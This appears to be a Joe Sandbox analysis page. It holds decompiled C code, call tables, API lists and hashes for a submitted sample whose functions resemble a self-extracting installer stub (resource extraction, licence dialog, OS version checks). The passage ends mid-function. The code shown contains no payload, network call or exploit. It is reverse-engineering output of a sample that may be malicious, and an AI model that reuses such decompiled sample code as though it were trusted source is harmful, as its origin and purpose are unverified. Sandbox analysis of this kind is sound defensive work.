0x00000000
0x00072af2
0x00072afc
0x00072b00
0x00072b05
0x00072b05
0x00072b0b
0x00072bca
0x00072bd1
0x00072b11
0x00072b18
0x00072b26
0x00072b99
0x00072bc8
0x00000000
0x00000000
0x00072b9b
0x00072bae
0x00072bb3
0x00072bb5
0x00072bb5
0x00072bb8
0x00072bb8
0x00072bba
0x00072bbb
0x00000000
0x00072bb8
0x00072b28
0x00072b2e
0x00072b33
0x00072b39
0x00072b3c
0x00072b3c
0x00072b3e
0x00072b3f
0x00072b55
0x00072b5d
0x00072b64
0x00072b64
0x00072b7a
0x00072b7f
0x00072b81
0x00072b81
0x00072b84
0x00072b84
0x00072b86
0x00072b87
0x00072bbf
0x00072bc1
0x00072bc1
0x00072b26
0x00072bda
0x00072bda
0x00072be6
0x00072be6
0x00072bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00072AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00072AF2
CharNextA.USER32(?), ref: 00072B12
CharUpperA.USER32 ref: 00072B1E
CharPrevA.USER32(?,?), ref: 00072B55
CharNextA.USER32(?), ref: 00072BD4

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: ad07abc5b6c19648561fb3cab26ca04f83c3a268a4ce830a595154a259a9934b
Instruction ID: 799a33e034390264fa397689fe97f71e81a4cdc41557ff974a60dc02750b2a84
Opcode Fuzzy Hash: ad07abc5b6c19648561fb3cab26ca04f83c3a268a4ce830a595154a259a9934b
Instruction Fuzzy Hash: 6B413A34E081855FEB559F348C54AFD7BA99F93300F04809AD8CE93242DB3D4E86CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 000743D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000743D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x78004; // 0xdaa0d862
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00076CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x000743d0
0x000743d8
0x000743df
0x000743e6
0x000743ec
0x000743f1
0x00074400
0x00074403
0x0007440b
0x00074420
0x00074429
0x00074437
0x00074444
0x00074447
0x0007444d
0x00074454
0x0007445b
0x00074460
0x00074461
0x00074467
0x0007446f
0x00074473
0x00074473
0x00074463
0x00074463
0x00074463
0x0007447a
0x00074481
0x00074484
0x0007448a
0x00074492
0x00074496
0x00074496
0x00074486
0x00074486
0x00074486
0x000744b8

APIs

GetWindowRect.USER32(?,?), ref: 000743F1
GetWindowRect.USER32(00000000,?), ref: 0007440B
GetDC.USER32(?), ref: 00074423
GetDeviceCaps.GDI32(00000000,00000008), ref: 0007442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0007443A
ReleaseDC.USER32(?,00000000), ref: 00074447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 000744A2

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 12423728f17de440f18868906f0ebe9c6ecc0fc6a409371ab924ed6e1ab0eb27
Instruction ID: 71beed392b63e84cee50b44e6c233ab6f22b569b71a6bb0e26bc5b9ccd9258a6
Opcode Fuzzy Hash: 12423728f17de440f18868906f0ebe9c6ecc0fc6a409371ab924ed6e1ab0eb27
Instruction Fuzzy Hash: 97314D72F00119AFDB14CFB8DD889EEBBB5EB89310F554169F809B3240DB386C458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00076298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00076298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x78004; // 0xdaa0d862
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0007171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x79124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x7a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0007171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00076CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00076298
0x000762a0
0x000762a7
0x000762ad
0x000762af
0x000762bb
0x000762c3
0x000762c4
0x0007633b
0x0007633b
0x00076345
0x0007634d
0x00000000
0x00000000
0x000762da
0x000762de
0x0007635f
0x00076369
0x000762e0
0x000762e0
0x000762e0
0x000762e3
0x000762e5
0x000762e5
0x000762e8
0x000762e8
0x000762ea
0x000762eb
0x000762ef
0x000762f1
0x000762f3
0x00076302
0x00076308
0x0007630d
0x00076314
0x00076314
0x00076316
0x00076319
0x00076355
0x00076357
0x0007631b
0x0007631b
0x00076331
0x00076334
0x00076339
0x00000000
0x00076339
0x00076319
0x0007636b
0x0007637d
0x0007637d
0x00000000

APIs

Part of subcall function 0007171E: _vsnprintf.MSVCRT ref: 00071750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,000751CA,00000004,00000024,00072F71,?,00000002,00000000), ref: 000762CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,000751CA,00000004,00000024,00072F71,?,00000002,00000000), ref: 000762D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000751CA,00000004,00000024,00072F71,?,00000002,00000000), ref: 0007631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00076345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000751CA,00000004,00000024,00072F71,?,00000002,00000000), ref: 00076357

Strings

UPDFILE%lu, xrefs: 000762B3, 00076329

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 699612de123c4531bc826aab9afec31254aa6c70792e3012fd7cfed80b6f35c2
Instruction ID: b6b3ff78a0de367c77fe00f9532598e6690b1d490127f228e79ca405a4c506e4
Opcode Fuzzy Hash: 699612de123c4531bc826aab9afec31254aa6c70792e3012fd7cfed80b6f35c2
Instruction Fuzzy Hash: CF21D271E00619ABEB149F64DC459FE7B78FB85710B008119E90AA3241DB3E9A42CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0007681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0007681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x78004; // 0xdaa0d862
				_v8 = _t19 ^ _t44;
				_t41 =  *0x781d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x781d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x781d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x71140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E000766F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x781d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00076CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x0007681f
0x0007682a
0x00076831
0x00076836
0x0007683c
0x0007683e
0x00076848
0x00076851
0x0007685d
0x00076864
0x00076876
0x0007693a
0x0007693a
0x0007687c
0x0007687e
0x00076885
0x00000000
0x000768d6
0x000768f4
0x00076900
0x00076902
0x0007690a
0x00000000
0x0007690c
0x0007690c
0x0007691c
0x00000000
0x0007691e
0x00076924
0x0007692b
0x00076932
0x00000000
0x00000000
0x00000000
0x0007692b
0x0007691c
0x0007690a
0x00076885
0x00076876
0x00076951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0007686E
GetSystemMetrics.USER32(0000004A), ref: 000768A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000768CC
RegQueryValueExA.ADVAPI32(?,00071140,00000000,?,?,0000000C), ref: 000768F4
RegCloseKey.ADVAPI32(?), ref: 00076902

Part of subcall function 000766F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0007691A), ref: 00076741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 000768C2

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 5747d7deb858028f4d66cbb1ca0b055dae7604628286f3b2c61a85afcba5ee51
Instruction ID: c4f7114bdef31dcb6d3ca3be1f3a66289c123968edd637bd5358bb6f67da7cca
Opcode Fuzzy Hash: 5747d7deb858028f4d66cbb1ca0b055dae7604628286f3b2c61a85afcba5ee51
Instruction Fuzzy Hash: 07318231F006189FEB618B12CC04BAA77BCEB45714F0081A5EA4EA6240DB3D9D858F96

Uniqueness

Uniqueness Score: -1.00%

Function 00073A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00073A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0007468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x78d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0007468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x78d4c, "<None>") == 0) {
							LocalFree( *0x78d4c);
							L9:
							 *0x79124 = 0;
							return 1;
						}
						_t9 = E00076517(_t19, 0x7d1, 0, E00073100, 0, 0);
						LocalFree( *0x78d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x79124 = 0x800704c7;
						L2:
						return 0;
					}
					E000744B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x78d4c);
					 *0x79124 = 0x80070714;
					goto L2;
				}
				E000744B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x79124 = E00076285();
				goto L2;
			}

0x00073a46
0x00073a57
0x00073a5d
0x00073a63
0x00073a6a
0x00073a91
0x00073a9a
0x00073ad8
0x00073b13
0x00073b19
0x00073b1b
0x00000000
0x00073b21
0x00073ae7
0x00073af4
0x00073afc
0x00000000
0x00000000
0x00073afe
0x00073a87
0x00000000
0x00073a87
0x00073aa8
0x00073ab3
0x00073ab9
0x00000000
0x00073ab9
0x00073a78
0x00073a82
0x00000000

APIs

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00072F64,?,00000002,00000000), ref: 00073A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00073AB3

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00074554

Part of subcall function 00076285: GetLastError.KERNEL32(00075BBC), ref: 00076285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00073AD0
LocalFree.KERNEL32 ref: 00073B13

Part of subcall function 00076517: FindResourceA.KERNEL32(00070000,000007D6,00000005), ref: 0007652A
Part of subcall function 00076517: LoadResource.KERNEL32(00070000,00000000,?,?,00072EE8,00000000,000719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00076538
Part of subcall function 00076517: DialogBoxIndirectParamA.USER32(00070000,00000000,00000547,000719E0,00000000), ref: 00076557
Part of subcall function 00076517: FreeResource.KERNEL32(00000000,?,?,00072EE8,00000000,000719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00076560

LocalFree.KERNEL32(00000000,00073100,00000000,00000000), ref: 00073AF4

Strings

LICENSE, xrefs: 00073A46
<None>, xrefs: 00073AC5

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 708037b9766a168d0f62259cdfc827d7a46f5ad0efd81446c09160373787291a
Instruction ID: 7a91adec62fcefe574e2dbba0ff606d8ca8029e361837c3cd126a5e59c2ccf7a
Opcode Fuzzy Hash: 708037b9766a168d0f62259cdfc827d7a46f5ad0efd81446c09160373787291a
Instruction Fuzzy Hash: 3C11A570F402416BF7345B329C09E5B3AA9EBD6710B10C42EBA4DF61A1DA7D88509669

Uniqueness

Uniqueness Score: -1.00%

Function 000724E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E000724E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x78004; // 0xdaa0d862
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0007658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00076CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x000724e0
0x000724eb
0x000724f2
0x000724f7
0x00072504
0x0007250e
0x0007251d
0x0007252c
0x00072541
0x00072546
0x00072553
0x00072555
0x00072555
0x00072546
0x0007256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00072506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0007252C
_lopen.KERNEL32(?,00000040), ref: 0007253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 0007254C
_lclose.KERNEL32(00000000), ref: 00072555

Strings

wininit.ini, xrefs: 00072510

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 03548fe2ea50c0c4f29abf2a5ca92d39fd692f92043ce54235caba173eea4220
Instruction ID: 5e65af9537dad787dd63399c2383df1228b177820416e49213bb5573bb236bd5
Opcode Fuzzy Hash: 03548fe2ea50c0c4f29abf2a5ca92d39fd692f92043ce54235caba173eea4220
Instruction Fuzzy Hash: 30019232F0011867D7209B659C0CEDF7BBDEB86750F004555FA4DE3190DA7C8E958AE5

Uniqueness

Uniqueness Score: -1.00%

Function 000736EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000736EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x78004; // 0xdaa0d862
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x78184 = 1;
						 *0x78180 = 1;
						L13:
						 *0x79a40 = _t119;
						L14:
						__eflags =  *0x78a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00072A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00072A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x78a38 & 0x00000001;
											if(( *0x78a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0007681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E000767C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E000728E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x79a40 = _t119;
						 *0x78184 = 1;
						 *0x78180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x79a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x78184 = _t135;
							 *0x78180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E000744B9(0, _t138);
					L66:
